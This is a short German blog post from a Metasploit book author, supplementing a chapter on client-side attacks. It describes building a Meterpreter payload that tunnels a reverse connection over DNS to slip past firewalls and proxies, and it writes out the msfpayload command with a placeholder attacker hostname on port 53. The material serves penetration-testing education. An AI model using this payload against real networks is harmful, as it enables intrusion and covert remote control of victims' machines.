no one is safe ...

DNS Payload um aus sicheren Netzwerkumgebungen auszubrechen

Dieser kurze Artikel dient als Ergänzung zu Kapitel 8.5 (Client Side Attacks - Ausschnitte davon sind hier zu finden) meines Metasploit Buches.

In Netzwerkumgebungen mit einem sehr hohen Sicherheitsniveau kann es vorkommen, dass die bisher dargestellten Versuche eines Verbindungsaufbaues fehlschlagen und weitere Mechanismen überlegt werden müssen.
Eine interessante Methode die in häufigen Fällen zum Erfolg führt ist DNS. In den meisten internen Netzwerken ist eine Auflösung externer Hostnamen über das DNS System möglich. Metasploit bietet einen Payload der sich dem DNS System bedient und über DNS Mitteilungen eine Meterpreter Verbindung aufbaut und sich darüber entsprechend auch bei restriktiven Firewall Regelwerk und abgesicherter Proxykette seinen Weg ins Internet zum Angreifer zurück bahnt.
Im Normalfall reicht es wenn der Hostname des Angreifers im Internet auflösbar ist. Im einfachsten Fall erstellt man wieder ein Binary mit msfpayload und bringt dieses auf dem zu testenden Clientsystem zur Ausführung:

root@ks361837:~ # msfpayload windows/meterpreter/reverse_tcp_dns LPORT=53 LHOST=hostname.domain.com X > port-53-reverse_dns.exe

Diese ausführbare Windows Datei muss auf dem internen System zur Ausführung gebracht werden. In folgender Abbildung wird der Verbindungsaufbau über DNS Mitteilungen dargestellt.

Am System des Angreifers muss vorab ein Multi-Handler mit dem passenden Payload auf Port 53 gestartet werden, der die Verbindungsanfrage entgegen nimmt.

Mit der dargestellten Methode ist auch ohne eine direkte Verbindungsmöglichkeit und ohne einer Möglichkeit die Verbindung über HTTP-Verkehr aufzubauen eine Möglichkeit gegeben die benötigte Verbindung vom internen Netzwerk aus zum Angreifer zurück aufzubauen.

Falls ihr weitere Informationen zu Metasploit benötigt findet ihr diese in meinem Buch. Erste Probekapitel findet ihr zudem auf der dpunkt-Webseite. Das Buch lässt sich natürlich auf Amazon bestellen.

Es gibt übrigens auf eine eBook Version, die sich hier über die dpunkt Webseite zu beziehen lässt.

Viel Spaß,
mIke